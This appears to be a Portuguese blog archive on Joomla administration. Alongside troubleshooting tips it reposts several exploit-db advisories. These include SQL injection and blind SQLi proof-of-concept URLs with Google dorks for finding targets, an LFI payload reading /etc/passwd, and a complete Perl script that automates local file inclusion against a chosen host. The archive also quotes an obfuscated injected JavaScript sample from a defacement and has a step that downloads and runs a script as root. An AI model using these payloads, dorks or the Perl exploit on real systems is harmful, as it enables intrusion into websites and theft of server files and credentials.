Got error 28 from storage engine SQL no Joomla e cia ;)

Standard

Bom, sem rodeios, se você está recebendo a mensagem de erro Got error 28 from storage engine SQL… mande que limpem a pasta /tmp do seu servidor.
Abraços ;). (SÓ LIMPE se a mensagem não for Error code 28: No space left on device)

Se for LEFT Space cheque o espaço em disco, principalmente no /tmp e /var, caso seja espaço excedido corrija-o eliminando o que não presta.

dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

Standard

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):

 

<script type=”text/javascript” language=”JavaScript”>// <![CDATA[

function xViewState()

{

var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a];

t=z=”;

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState();

// ]]></script>

Que normalmente respondem como xVIEWSTATE ou DNNVIEWSTATE, a saída para xViewState e dnnViewState está em localizar os termos em arquivos do joomla, mas 1 em comum costuma ser atacado, o arquivo modules/mod_AutsonSlideShow/tmpl/default.php, limpe a função acima (javascript) e o problema estará sanado!
Reza a lenda que wordpress sofre disso.
Para varrer seu código use o Dreamweaver ou qualquer IDE (até mesmo o terminal) que faça varredura em todos arquivos por um termo em especial (procure por dnnView ou xView) e finish!

Abraços!

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Standard

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Standard


=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \ / /____ | | / _ | __ ______ | |/ __ |
___/ > < | |_> > |_( ) || | /_____/ | / /_/ |
___ >__/_ | __/|____/____/|__||__| |______ |
/ /|__| /
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I’m Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####

[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ …others |
============================================================================================ |

Fonte: http://www.exploit-db.com/exploits/17603/

Joomla Component mod_spo SQL Injection Vulnerability

Standard


# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability

Standard


#! /usr/bin/perl -w

# Joomla Component JE Story Submit Local File Inclusion Vulnerability
# Author : v3n0m
# Date : July, 21-2011 GMT +7:00 Jakarta, Indonesia
# Software : JE Story Submit
# Vendor : http://joomlaextensions.co.in/
# License : GPLv2 or later
# Tested On: Joomla 1.5.x
# irc.yogyacarderlink.web.id - www.yogyacarderlink.web.id
#
# PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00
#

use LWP::UserAgent;
use HTTP::Request::Common;

my ($host, $file) = @ARGV ;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|==========================================================|n";
print "| 'Joomla Component JE Story Submit Local File Inclusion' |n";
print "| Coded by : v3n0m |n";
print "| Dork : inurl:com_jesubmit |n";
print "| |n";
print "| www.yogyacarderlink.web.id |n";
print "| |n";
print "|===================================[ YOGYACARDERLINK ]====|n";
print "nUsage: perl $0 n";
print "tex: perl $0 http://www.site.com /etc/passwdnn";

$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ //$/);

my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
$ua->timeout(10);

my $request = HTTP::Request->new();
my $response;
my $url = $host."index.php?";

my $req = HTTP::Request->new(POST => $host."index.php?");
$req->content_type('application/x-www-form-urlencoded');
$req->content("option=com_jesubmit&view=".("/.."x10).$file."%00");

$request = $ua->request($req);
$result = $request->content;

$result =~ s/<[^>]*>//g;

print $result . "n";
exit;

Como verificar versões de CMS de maneira rápida e prática

Standard

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo:

root@appunix:˜#wget http://server.cmsversion.com/checktest.sh

ou

root@appunix:˜#wget http://www.libphp.net/checktest.sh

Em seguida fazer o seguinte

root@appunix:˜#chmod +x checktest.sh

root@appunix:˜#./checktest.sh -u logindeumacontanomeuserver

A saída deverá assemelhar-se com:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

Essa dica funciona para Joomla, WordPress, WHMCS e etc.

Joomla mdigg Component SQL Injection Vulnerability

Standard

=====================================================================

.__         .__  __            .__    .___
____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \  /  /____ |  |  /  _ |     __  ______ |  |/ __ |
  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
___  >__/_ |   __/|____/____/|__||__|           |______ |
/      /|__|                                          /
Exploit-ID is the Exploit Information Disclosure
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####
[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others                                                                              |

============================================================================================ |

 

Fonte: http://www.exploit-db.com/exploits/17464/

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

Standard

———————————————————————————
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
———————————————————————————

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[alt+64]gmail.com
Date : 19 June 2011
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
—————————————————————————

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Calc Builder
version : 0.0.1
Developer : Guillermo Santiago
License : GPLv2 or later type : Commercial
Date Added : 12 June 2011
Price : 9.90 €
Demo : http://components.moonsoft.es/democalcbuilder
Download : http://components.moonsoft.es/downloadcalcbuilder

Description :

CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.

—————————————————————————

I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~~
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C

A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita 🙂

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Joomla Component (com_team) SQL Injection Vulnerability

Standard

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

Fonte: http://www.exploit-db.com/exploits/17412/

Joomla Component com_joomnik SQL Injection Vulnerability

Standard

 

<------------------- header data start ------------------- >

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################

http://joomlacode.org/gf/project/joomnik/

Warning: Parameter 2 to frontpage() expected to be a reference

Standard


Este é um problema que vem atormentando usuários joomla em suas versões 1.0.x (x são variantes). Isto pode ocorrer também pelo fato da versão do php estar sendo 5.3.x.
Para sanar este problema é necessário aplicar um patch substituindo 2 arquivos:

/includes/Cache/Lite/Function.php
#Resolve o valor de referência

/includes/vcard.class.php
#Resolve problemas com formulários.

O patch segue no link abaixo:
http://www.libphp.net/fix_joomla_10x_php_530.zip